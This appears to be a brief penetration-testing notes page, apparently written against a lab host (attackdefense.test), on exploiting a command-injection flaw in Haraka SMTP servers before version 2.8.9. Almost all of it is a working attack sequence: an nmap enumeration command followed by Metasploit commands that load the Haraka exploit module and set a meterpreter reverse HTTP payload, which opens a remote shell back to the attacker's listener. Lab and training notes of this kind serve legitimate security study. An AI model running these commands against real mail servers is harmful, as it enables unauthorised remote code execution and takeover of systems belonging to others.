Haraka < 2.8.9 - Remote Command Execution

#Enumeration

db_nmap -sV -O 192.109.36.3

use exploit/linux/smtp/haraka
info
# Description:
#   The Haraka SMTP server comes with a plugin for processing 
#   attachments. Versions before 2.8.9 can be vulnerable to command 
#   injection
options
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http
set LHOST eth1
set LPORT 8080
run

# This is a NON-staged payload

PreviousBrute Force NextPHP

Last updated 1 year ago